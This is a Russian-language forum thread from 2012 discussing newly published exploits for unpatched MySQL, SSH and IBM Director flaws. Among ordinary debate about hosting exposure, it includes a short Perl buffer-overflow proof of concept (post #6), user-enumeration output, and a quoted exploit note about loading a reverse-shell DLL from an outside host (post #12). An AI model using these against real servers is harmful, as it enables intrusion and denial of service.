The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Опубликована серия эксплоитов для неисправленных уязвимостей..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от opennews (??) on 03-Дек-12, 00:03 
Некто, скрывающийся под псевдонимом "Kingcope (http://www.exploit-db.com/author/?a=1856)", опубликовал (http://seclists.org/fulldisclosure/2012/Dec/index.html) списке рассылки Full Disclosure семь "zero-day" эксплоитов, поражающих неустранённые уязвимости в MySQL 5.1.x/5.5.x, а а также серию эксплоитов, поражающих продукты FreeSSHd (http://www.freesshd.com/), freeFTPd (http://www.freesshd.com/), IBM System Director (http://www-03.ibm.com/systems/software/director/) и SSH (http://www.ssh.com) (не путать с OpenSSH).


Отмеченные в эксплоитах уязвимости в MySQL теоретически позволяют удалённо осуществить повышение привилегий до администратора СУБД или получить доступ к выполнению команд на сервере (запуск shell). Проведение атаки требует наличие у злоумышленника возможности аутентифицированного подключения к СУБД, т.е. наличия аккаунта. Два эксплоита специфичны для платформы Windows (1, 2), а три поражают Linux-системы (1, 2, 3) и протестированы с последними версиями пакетов с MySQL из состава openSUSE, SUSE и Debian Lenny. Первый из эксплоитов для Linux для своей работы требует наличия прав FILE, а два остальных оформленны в виде демонстрационных прототипов, показывающих наличие уязвимости, но не позволяющих без доработки совершить атаку. Дополнительно опубликованы не требующие аутентификации эксплоиты для инициирования отказа в обслуживании и проверки наличия имени пользователя.

Так как обновления с устранением уязвимостей ещё не доступны, администраторам MySQL рекомендуется ограничить доступ к СУБД только с доверительных хостов.  Проследить за выходом обновлений  для популярных дистрибутивов можно на данных страницах:  Ubuntu (https://lists.ubuntu.com/archives/ubuntu-security-announce/), Mandriva (http://www.mandriva.com/en/security/advisories?dis=2011), Gentoo (http://www.gentoo.org/security/), openSUSE (http://lists.opensuse.org/opensuse-security-announce/), CentOS (http://lists.centos.org/pipermail/centos-announce/), Scientific Linux (http://listserv.fnal.gov/scripts/wa.exe?A1=ind1212&L=scienti...), Fedora (https://admin.fedoraproject.org/updates/F17/security), RHEL (http://rhn.redhat.com/errata/rhel-server-errata.html), Debian (http://www.debian.org/security/), FreeBSD (http://www.vuxml.org/freebsd/).


Интересны также уязвимости в FreeSSHd и в реализации SSH от компании SSH Communications Security Corp., в недрах которой был разработан протокол SSH, позволяющие пропустить фазу проверки пароля и войти в систему с любым паролем. Одновременно можно отметить несколько уязвимостей (http://www.debian.org/security/2012/dsa-2577) в библиотеке libssh (http://www.libssh.org/), позволяющих инициировать крах из-за обращения к областям памяти за пределами буфера, что теоретически может быть использовано для организации выполнения кода злоумышленника.


URL: http://seclists.org/fulldisclosure/2012/Dec/index.html
Новость: http://www.opennet.me/opennews/art.shtml?num=35486

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


4. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 00:08 
Работает, наверное :)
% ./mysql_userenum_pl.bin 192.168.255.3 english.dic
[*] HIT! -- USER EXISTS: !@192.168.255.3
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 00:47 
> Debian Lenny

Тут нет ошибки? Именно Lenny?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от epic_fail on 03-Дек-12, 04:16 
Скорее всего да. Видимо баги очень давние. Приватные.
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

6. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +4 +/
Сообщение от lemanyk (ok) on 03-Дек-12, 00:59 
mysql настолько решето, что уже даже не смешно

#!/usr/bin/perl
  use strict;
  use DBI();

  # Connect to the database.
  my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                         "user", "secret",
                         {'RaiseError' => 1});

  $a ="A" x 100000;
  my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
  $sth->execute();
  
  # Disconnect from the database.
  $dbh->disconnect();

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

7. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +6 +/
Сообщение от lemanyk (ok) on 03-Дек-12, 01:02 
шаред хостингам писец
Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

15. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 06:18 
Вот уж чего не жалко. Тупиковая ветвь эволюции.
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

19. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Georges (ok) on 03-Дек-12, 10:40 
Что предлагаете взамен?
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

38. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 14:51 
> Что предлагаете взамен?

Облако без штанов :)))))))))))))

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

8. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Michael Shigorin email(ok) on 03-Дек-12, 01:13 
Спрашивал днём в packagers@mysql, ответа пока не было (неудивительно): http://lists.mysql.com/packagers?date=2012-12
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от commiethebeastie (ok) on 03-Дек-12, 01:21 
Ни один не работает, все пишут access denied, несмотря на то, что логин, пароль и база правильные.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  –1 +/
Сообщение от myhand (ok) on 03-Дек-12, 01:42 
> Ни один не работает, все пишут access denied, несмотря на то, что
> логин, пароль и база правильные.

"Ни один", блин...  Небось ровно один и протестировал - см. #10.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

10. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от myhand (ok) on 03-Дек-12, 01:40 
mysql_privilege_elevation.pl - работает только ежели пользователю грант FILE дать...  // squeeze
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

12. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Михрютка (ok) on 03-Дек-12, 01:46 
The following exploit will load the dll from
\\isowarez.de\\director\wootwoot.dll
the wootwoot.dll is a reverse shell that will send a shell back to the
attacker (the code has to be inside the dll initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not
on 5.2.30 SP2 and above.

ну красава, чо. впрочем, если кто-то держит 4 года непатченый директор, да еще его в интернеты выставляет, я такому вазелин со склада не выдавал бы из принципа.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +2 +/
Сообщение от Аноним (??) on 03-Дек-12, 09:01 
> версиями пакетов с MySQL из состава Debian Lenny

                                      ^^^^^^^^^^^^
О, свежачком запахло ...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

26. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от myhand (ok) on 03-Дек-12, 11:30 
>> версиями пакетов с MySQL из состава Debian Lenny
>     ^^^^^^^^^^^^
>  О, свежачком запахло ...

Для не умеющих читать самостоятельно балбесов: ошибки критичны для 5.0-5.5.  Так что достанется буквально всем.  Не нравится Lenny - можете попробовать на Squeeze, там 5.1.  Или Wheezy.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

28. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Andrey Mitrofanov on 03-Дек-12, 11:37 
> Для не умеющих читать

..."""to be honest I didn't have a look into these optimizations and protections, it's hard enough to exploit it without these restrictions applied. seclists.org/fulldisclosure/2012/Dec/21

Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

18. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 09:48 
Хм, за это люди ещё и деньги платят...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 10:48 
Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников уже нет.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  –1 +/
Сообщение от Аноним (??) on 03-Дек-12, 10:50 
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.

Любой нормальный оператор хостинга выставляет.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

23. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 11:09 
Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

24. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +1 +/
Сообщение от Аноним (??) on 03-Дек-12, 11:19 
> Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?

Такое допустимо в локальной сети, если структура корпоративного приложения основана но толстых клиентах, а на сервере слушатель сидит на реальном IP адресе. У такой схемы, конечно, есть определенные преимущества.

Если слушатель выставлен в Интернет - это глупость великая. Обычно между SQL сервером и внешним миром находится сервер приложений (java, PHP еtс), и SQL сервер непосредственно из сети никаким образом невидим. Он должен слушать только localhost. Если администрирование через phpMyAdmin, то это ничего не меняет.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

25. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Туаук on 03-Дек-12, 11:21 
Проблема в том что хомячки хотят доступ со своей персоналочки.
Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

31. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 12:18 
> Проблема в том что хомячки хотят доступ со своей персоналочки.

Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами, нужен носитель или засланный казачок. Что усложняет задачу на порядок.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

39. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 14:52 
>> Проблема в том что хомячки хотят доступ со своей персоналочки.
> Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами,
> нужен носитель или засланный казачок. Что усложняет задачу на порядок.

Ошибаешься. Нельзя взломать только совесть - да и то лишь у некоторых. (С)

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

27. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от myhand (ok) on 03-Дек-12, 11:34 
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.

Зачем в сеть?  Любой массовый виртуальный хостинг дает доступы своим клиентам.  Для эксплуатации - есть все, что нужно.  Стать клиентом можно за суммы =< 1$.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

29. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Andrey Mitrofanov on 03-Дек-12, 11:38 
>  Для эксплуатации - есть все, что нужно.
> Стать клиентом можно за суммы =< 1$.

Найти дырявый php с sql-инджектом -- бесц^Hплатно.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

30. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 12:16 
Можно, но это не имеет отношения к сабжу.
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

40. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Andrey Mitrofanov on 03-Дек-12, 15:04 
>не имеет отношения к сабжу.

Как и уплата $1.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

43. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +1 +/
Сообщение от myhand (ok) on 03-Дек-12, 18:19 
> Можно, но это не имеет отношения к сабжу.

Еще как имеет, вьюнош.  Вам комикс нарисовать, чтобы наконец дошло?

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

32. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +1 +/
Сообщение от Аноним (??) on 03-Дек-12, 12:19 
>> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
>> уже нет.
> Зачем в сеть?  Любой массовый виртуальный хостинг дает доступы своим клиентам.
>  Для эксплуатации - есть все, что нужно.  Стать клиентом
> можно за суммы =< 1$.

Для определенности, что именно он дает? Дает белый IP адрес и сидящий на порту 3306 слушатель MySQL? Сильно сомневаюсь.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

36. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  –1 +/
Сообщение от angra (ok) on 03-Дек-12, 14:33 
Твое видение имеет очень далекое отношение к реальности, мускул открытый в мир вполне обычное явление для shared hosting. Но даже если случилось чудо и он закрыт для мира, то можно по-прежнему за копейки стать клиентом и получить к нему доступ.
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

44. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от myhand (ok) on 03-Дек-12, 18:22 
> Для определенности, что именно он дает?

Дает базу (или несколько) и логин/пароль для доступа к ней.  Это позволит любому клиенту хостинга пойграться с предложенными скриптами.

А посредством уязвимостей в ПО этого клиента, тех же SQL-инъекций - еще и неопределенно большой компании кулхацкеров.


Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

33. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от XoRe (ok) on 03-Дек-12, 13:02 
> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
> уже нет.

Вы даже не представляете, сколько хостеров в рунете держат 3306 порт открытым наружу.
Включая самые крупные.
А ещё over 9000 хостеров планеты.
Это просто праздник для скрипткидисов.
Грабь, убивай, ломай чужие хоумпаги!
Короче, жесть.

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

37. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  –1 +/
Сообщение от angra (ok) on 03-Дек-12, 14:35 
Даже если нет открытого в мир мускула, то есть phpmyadmin.
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

34. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 03-Дек-12, 13:48 
> протестированы с последними версиями пакетов с MySQL из состава openSUSE, SUSE и Debian Lenny.

интересно зачем было тестировать дебьяновкий oldstable?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

35. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от тоже Аноним (ok) on 03-Дек-12, 14:07 
Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде не применяется, а давно и успешно используемые в реальной жизни системы.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

45. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от myhand (ok) on 03-Дек-12, 18:27 
> Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде
> не применяется, а давно и успешно используемые в реальной жизни системы.

Замечательно и "свежак" затрагивает.  обрати внимание на версии MySQL в статье.

Lenny был помянут из-за того, что там тестировалась самая старая версия (5.0) из отобранных дистрибутивов.

[сообщение отредактировано модератором]

Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

48. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от тоже Аноним email(ok) on 04-Дек-12, 08:41 
"Не только свежак", если угодно. Имелось в виду, что дыры в нестабильных версиях никого, кроме разработчиков, не волнуют. А вот в стабильных, да еще давно стабильных...
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

50. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Elhana (ok) on 04-Дек-12, 11:56 
У firstvds например если кто создал vds с openvz года три назад и не переезжал, то он так на etch и остался.
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

42. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +4 +/
Сообщение от anonymousY (ok) on 03-Дек-12, 16:11 

Посмотрел эксплоиты, там либо "эксплуатируется" привилегия FILE, которая равносильно ADMIN на базу, либо PoC, не имеющие рабочей реализации из-за фильтрации ввода на соответствие  UTF, которые к тому же уже зарепорчены, и в MariaDB исправлены.
Единственное интересное - DOS, но кого этим удивишь? При наличии аккаунта, базу раком поставить не сложно в любом случае.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от XoRe (ok) on 03-Дек-12, 22:41 
> и в MariaDB исправлены.

Не у всех MariaDB

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

47. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от anonymous (??) on 04-Дек-12, 02:36 

Для танкистов:
эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

51. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 04-Дек-12, 12:36 
> эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.

Для Windows эксплоиты рабочие, а для Linux кому нужно ума хватит довести до рабочего состояния.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

52. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от Аноним (??) on 04-Дек-12, 12:42 
> эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и
> ломаного гроша не стоит.

То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и существование работающих эксплоитов.

http://openquery.com/blog/mariadb-security-updates
CVE-2012-5579, a vulnerability that allowed an authenticated user to crash MariaDB server or to execute arbitrary code with the privileges of the mysqld process. This is a serious security issue. We recommend upgrading from older versions as soon as possible.


https://bugzilla.redhat.com/show_bug.cgi?id=881064
A stack-based buffer overflow flaw was found in the way MySQL, a multi-user, multi-threaded SQL database server, performed verification if specific user had the right to access particular database. An authenticated database user could use this flaw to cause mysqld daemon crash (denial of service) or, potentially, to execute arbitrary code with the privileges of the user running the mysqld daemon, by providing a specially-crafted database name to the routine checking the access rights.

https://bugzilla.redhat.com/show_bug.cgi?id=882600
A heap-based buffer overflow was found in Mysql. An authenticated database user could use this flaw to cause mysqld to crash or possibly execute arbitrary code with the privileges of the user running mysql.


Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

53. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от anonymousY (ok) on 04-Дек-12, 14:46 

>То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и существование работающих эксплоитов.

Наличие рабочих эксплоитов сомнительно, надо обмануть парсер utf. Теоретически возможно, но на практике почти нереально.

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

55. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +/
Сообщение от XoRe (ok) on 05-Дек-12, 01:49 
> Для танкистов:
> эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и
> ломаного гроша не стоит.

Ога.
До публикации уязвимости вы, наверное, считали, что и уязвимости нет.
В конце концов, неизвестный источник мог обнародовать _не_все_ дырки.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

56. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  +1 +/
Сообщение от demimurych email(ok) on 05-Дек-12, 13:09 
Неизвестный источник слил никому ненужный мусор.

PoC слили потому что способа реализовать атаку так и не нашли. Отдали общественности - может найдется гений и придумает способ.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

54. "Опубликована серия эксплоитов для неисправленных уязвимостей..."  –2 +/
Сообщение от Анониимус email on 04-Дек-12, 15:56 
Крутотень. Уже поимел root доступ и положил пару хостеров.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру